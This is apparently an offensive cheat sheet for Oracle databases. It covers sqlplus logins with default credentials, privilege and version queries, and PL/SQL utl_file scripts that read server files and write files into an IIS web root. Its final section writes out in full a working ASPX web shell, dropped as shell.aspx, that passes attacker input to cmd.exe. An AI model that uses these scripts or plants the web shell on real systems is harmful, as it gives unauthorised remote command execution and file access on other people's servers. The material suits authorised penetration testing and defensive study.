Oracle Database

Basics

Oracle Connection command

Linux:

sqlplus64 <user>/<password>@<host-IP>:1521/<sid>

Example: with default user id and password

sqlplus64 scott/tiger@127.0.0.1:1521/XE

Oracle Connection command as sysdba

Connecting as system Database Administrator

sqlplus64 <user>/<password>@<host-IP>:1521/<sid> as sysdba

Oracle Check user privileges on database

select * from session_privs;
select * from user_role_privs;

Oracle version:

select banner from v$version; 

System information:

System Information

SELECT platform_id, platform_name FROM v$database; 

SELECT dbms_utility.port_string FROM DUAL; 

SELECT PRODUCT, VERSION FROM SYS.PRODUCT_COMPONENT_VERSION;   

Oracle Reading file from file system

Let set the environment variable in SQL serveroutput to ON

SQL> set serveroutput on

SQL code to Read a file from the file system:

Read a iisstart.htm file
declare
  f utl_file.file_type;
  s varchar(200);
begin
  f := utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
  utl_file.get_line(f,s);
  utl_file.fclose(f);
  dbms_output.put_line(s);
end;

Forward slash / to execute the script

Oracle Write to a file

This script when executed will create the cybofile.txt file in /inetpub/wwwroot directory path and write the data in the payload variable.

Write to a file
declare
  f utl_file.file_type;
  payload varchar(5000) := 'Hello world';
begin
  f := utl_file.fopen('/inetpub/wwwroot','cybofile.txt','W');
  utl_file.put_line(f,payload);
  utl_file.fclose(f);
end;
/

Oracle Shells

Oracle doesn't allow not more than 1024 chars to write, so when building the payload pay attention to the length.

PL/SQL aspx

Writing a shell.aspx file, the payload has been stripped out new lines and comments to reduce the size

PL/SQL script
declare
  f utl_file.file_type;
  payload varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
  f := utl_file.fopen('/inetpub/wwwroot','shell.aspx','W');
  utl_file.put_line(f,payload);
  utl_file.fclose(f);
end;

Basics​

Oracle Connection command​

Oracle Connection command as sysdba​

Oracle Check user privileges on database​

Oracle version:​

System information:​

Oracle Reading file from file system​

Oracle Write to a file​

Oracle Shells​

PL/SQL aspx​